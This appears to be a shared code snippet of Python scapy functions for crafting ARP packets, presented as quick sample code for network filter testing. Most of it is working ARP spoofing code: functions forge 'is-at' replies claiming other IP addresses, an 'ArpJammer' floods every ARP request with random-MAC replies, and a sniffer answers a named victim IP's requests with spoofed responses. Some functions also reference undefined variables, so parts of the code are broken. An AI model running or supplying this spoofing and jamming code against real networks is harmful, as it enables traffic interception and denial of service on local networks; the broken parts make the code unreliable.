xcke
3/21/2018 - 9:10 PM

Some quick-n-dirty sample code and functions to manipulate ARP packets (for network filter testing).

Some quick-n-dirty sample code and functions to manipulate ARP packets (for network filter testing).

arp_scapy.py
content_copyfile_download
from scapy.all import *


# change this to your test machine's MAC address
SELF_MAC = '00:0c:29:67:22:c2'

BCAST_MAC = 'ff:ff:ff:ff:ff:ff'


# this will send a PROBE ARP request packet to the supplied IP address argument
def create_ARP_request_probe(ipaddr_to_probe):
    arp = ARP(psrc='0.0.0.0', hwsrc=SELF_MAC, pdst=ipaddr_to_probe)
    return Ether(dst=BCAST_MAC)/arp


# this will send a gratuitous REQUEST ARP packet, pretending to have the IP
# address set to `ipaddr_to_broadcast`
def create_ARP_request_gratuitous(ipaddr_to_broadcast):
    arp = ARP(psrc=ipaddr_to_broadcast, hwsrc=SELF_MAC, pdst=ipaddr_to_broadcast)
    return Ether(dst=BCAST_MAC)/arp


def create_ARP_request_directed(
        ipaddr_target,          # this is the target machine, set this to its actual IP address
        ipaddr_src_spoof,       # this is what the target machine will think this ARP packet comes from, might be spoofed
        eth_dest=BCAST_MAC):    # either leave as is (broadcast), or set it to the target machine's actual MAC address
    arp = ARP(psrc=ipaddr_src_spoof, hwsrc=self_mac, pdst=ipaddr_target)
    eth = Ether(dst=eth_dest)
    return eth/arp


# similar to create_ARP_request_gratuitous, except we are using RESPONSE ARP packet
# with op code 2 (is-at)
def create_ARP_response_gratuitous(ipaddr_to_advertise):
    arp = ARP(psrc=ipaddr_to_advertise, hwsrc=self_mac, pdst=ipaddr_to_advertise, hwdst=self_mac, op=2)
    eth = Ether(dst=broadcast_mac)
    return eth/arp


# create an unsolicited ARP RESPONSE packet to the target nachine;
# could be used to spoof a response packet RIGHT AFTER seeing a request, to pretend to be `ipaddr_to_spoof`
def create_ARP_response_directed(
        ipaddr_to_spoof,    # the IP address we are claiming to be, within the ARP RESPONSE packet
        ipaddr_target,      # the target machine's real IP address
        mac_target):        # the target machine's real MAC address
    arp = ARP(hwsrc=SELF_MAC, psrc=ipaddr_to_spoof, hwdst=mac_target, pdst=ipaddr_target, op=2)
    eth = Ether(dst=mac_target)
    return eth/arp


## !!! HOW TO SNIFF ARP PACKETS (and possibly respond with SPOOFS) !!! ##

## First, some sample code (taken from http://www.craigdodd.co.uk/posts/exploiting-arp-with-python) ##

import threading
import time
 
from scapy.all import *
 
class ArpJammer(threading.Thread):
    def __init__(self, pkt):
        self.pkt = pkt
        self.pkt_count = 10
        super(ArpJammer, self).__init__()
 
    def run(self):
        a = ARP()
        a.op = 2
        a.psrc = self.pkt[ARP].pdst
        a.hwsrc = RandMAC()
        a.pdst = self.pkt[ARP].psrc
        a.hwdst = self.pkt[ARP].hwsrc
        p = Ether(dst=self.pkt[ARP].hwsrc) / a
        for i in range(self.pkt_count):
            sendp(p)
            time.sleep(2)
 
def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op == 1:
        ArpJammer(pkt).start()
 
def sniff_with_jammer():
    sniff(prn=arp_monitor_callback, filter='arp', store=0)

## End sample ##


VICTIM_IPADDR = '192.168.253.149'

def send_spoofed_ARP_response(pkt):
    arp = pkt[ARP]
    req_who_has = arp.pdst
    req_ipaddr = arp.psrc
    req_mac = arp.hwsrc
    
    resp_spoofed = create_ARP_response_directed(req_who_has, req_ipaddr, req_mac)
    #resp_spoofed.display()
    sendp(resp_spoofed)

def arp_monitor_spoofer(pkt):
    if ARP in pkt and pkt[ARP].op == 1:     # only act on REQUEST ARP
        if pkt[ARP].psrc == VICTIM_IPADDR:
            send_spoofed_ARP_response(pkt)

def sniff_with_spoofer():
    sniff(prn=arp_monitor_spoofer, filter='arp', store=0)